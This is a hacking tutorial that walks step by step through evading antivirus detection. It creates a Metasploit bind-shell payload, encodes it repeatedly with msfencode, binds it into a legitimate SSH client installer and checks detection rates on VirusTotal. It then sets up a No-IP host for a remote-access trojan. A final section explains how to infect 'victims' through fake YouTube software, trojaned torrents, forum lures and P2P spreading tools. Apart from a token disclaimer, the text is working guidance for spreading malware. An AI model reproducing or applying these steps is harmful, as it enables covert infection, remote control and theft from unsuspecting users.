How To Bypass Antivirus Detection - Making An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements 

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!
Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at hax0rtools are not responsible for.
Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus. 

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below: 

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener 

this process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below : 

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers. 

How To Create No-iP Host

 No-Ip Program offers you many services And is used by a hacker to connect to the victim 



1. Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"



3. Now It's Time To Choose Your Host Name!



--//--

Hostname: Your Host Name, EG:

YourHostName.no-ip.biz

Host Type: DNS Host (A)

Dont Care About The Rest, Once You've Choosen Your Host Name, Press "Create Host" In The Lower Right Bottom.

The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up & Log In With Your No-ip Username & Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.



--// Note: Always Have No-IP Open When You Have RAT Open!

How To Get More Victims To Your Rat

Maybe you saw some people get hundreds of victims every day They rely on the penetration of random And all their victims from popular forums and torrent Today I will explain to you the ways in which they use .



Sources of the victims :

Torrrent
Social networks & Forums
Sites publish the files like dvb-upload.com
Chat rooms

How to get victims :

• Create a fake software  Has become a widespread phenomenon in youtubeYou can experiment and you'll get thousands of victims But you first have to increase the number of Views I advise you to use vagex.com and Of course you you must to disable comment on your video

• Torrent the best source of victim you can easily create your account in thepiratebay.com and create a torent using Any program that supports torrent just choose a software and inject or bind this software with your clean server and do not forget to add trackers  in your torrent

This video explain how to create a torrent :

• from the forums you can get a lot of victims Some times I put private software and remember Do not put a download link But (Pm Me :D for mediafire link) To target members :) So this method is not in all forums you can put the link in the warez site There is no need not explain :)

Some professional hackers Use other ways They scan  A large number of Random Ip To discover Exploit Will generally put a special topic in this type ...

And finally offer you a program named  Spread Robot With this program you can spread your server in(Shareaza - Areas - eMule )

The main interface of the program:

Click Get Warez :

and choose the path of your server and Make Warez File :

Then the software will create a file in which each of these programs and share the files in (Shareaza - Areas - eMule )

 Always select Icon Setup or Install the Server and pumb the files  Even up to 2mg  using hex workshop

Download :

Spread Robot